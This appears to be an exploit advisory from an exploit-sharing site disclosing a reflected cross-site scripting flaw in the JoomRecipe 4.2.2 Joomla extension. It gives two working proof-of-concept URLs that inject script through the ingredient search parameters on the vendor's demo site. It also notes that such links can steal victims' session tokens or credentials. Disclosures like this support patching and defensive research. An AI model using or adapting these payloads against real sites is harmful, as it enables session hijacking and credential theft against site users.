id: 38007
date: 10/03/2022
title: Joomla JoomRecipe 4.2.2 Cross Site Scripting Vulnerability
author: CraCkEr
cves: 

┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                      [ Exploits ]                                    ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:  Author   : CraCkEr                                                                    :
│  Website  : extensions.joomla.org                                                      │
│  Vendor   : JoomBoost                                                                  │
│  Software : JoomRecipe 4.2.2 Extension for Joomla - Reflected XSS                      │
│  Vuln Type: Reflected XSS                                                              │
│  Method   : GET                                                                        │
│  Impact   : Manipulate the content of the site                                         │
│                                                                                        │
│────────────────────────────────────────────────────────────────────────────────────────│
│                              B4nks-NET irc.b4nks.tk #unix                             ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:                                                                                        :
│  Release Notes:                                                                        │
│  ═════════════                                                                         │
│  The attacker can send to victim a link containing a malicious URL in an email or      │
│  instant message can perform a wide variety of actions, such as stealing the victim's  │
│  session token or login credentials                                                    │
│                                                                                        │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                                                                      ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   
       
  CryptoJob (Twitter) twitter.com/CryptozJob
     
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                    © CraCkEr 2022                                    ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘


GET parameter 'withIngredients%5B%5D' is vulnerable to XSS

https://joomrecipe-demo.joomboost.com/search-recipes/search/results.html?searchPerformed=1&&withIngredients%5B%5D=hpf5w"><script>alert(1)</script>u7d68fi0pz1

GET parameter 'withoutIngredients%5B%5D' is vulnerable to XSS

https://joomrecipe-demo.joomboost.com/search-recipes/search/results.html?searchPerformed=1&withoutIngredients%5B%5D=ucc8c"><script>alert(1)</script>lylajy83wro


[-] Done

#  0day.today [2023-03-23]  #